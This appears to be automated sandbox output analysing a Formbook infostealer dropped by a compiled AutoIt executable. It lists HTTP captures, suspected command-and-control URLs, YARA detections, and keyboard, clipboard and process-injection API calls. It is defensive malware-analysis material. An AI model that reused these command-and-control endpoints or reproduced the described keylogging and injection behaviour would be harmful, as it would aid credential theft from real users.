Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 36 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 62 75 6c 6c 65 74 69 6e 6e 65 73 74 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:35 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:38 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:40 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:43 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: convert.exe, 00000008.00000002.4580175851.000000000490A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.00000000042FA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2
Source: convert.exe, 00000008.00000002.4580175851.0000000004C2E000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000461E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0
Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4580723330.0000000005253000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.cavetta.org.mt
Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4580723330.0000000005253000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.cavetta.org.mt/yhnb/
Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: convert.exe, 00000008.00000002.4580175851.0000000003C7A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000366A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: convert.exe, 00000008.00000002.4573809328.0000000002949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.c
Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: convert.exe, 00000008.00000003.2745440600.00000000077EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: convert.exe, 00000008.00000002.4573809328.0000000002949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0088425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_0088425A
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00884458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 1_2_00884458
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0088425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_0088425A
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00870219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 1_2_00870219
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0089CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_0089CDAC

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: This is a third-party compiled AutoIt script. 1_2_00813B4C
Source: hkLFB22XxS.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: hkLFB22XxS.exe, 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_92048b26-d
Source: hkLFB22XxS.exe, 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_cc3b59bc-a
Source: hkLFB22XxS.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f3d8992e-4
Source: hkLFB22XxS.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_777ff0bd-c
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042B253 NtClose, 2_2_0042B253
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B60 NtClose,LdrInitializeThunk, 2_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_02F72C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_02F72DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk, 2_2_02F735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F74340 NtSetContextThread, 2_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F74650 NtSuspendThread, 2_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72AF0 NtWriteFile, 2_2_02F72AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72AD0 NtReadFile, 2_2_02F72AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72AB0 NtWaitForSingleObject, 2_2_02F72AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72BF0 NtAllocateVirtualMemory, 2_2_02F72BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72BE0 NtQueryValueKey, 2_2_02F72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72BA0 NtEnumerateValueKey, 2_2_02F72BA0
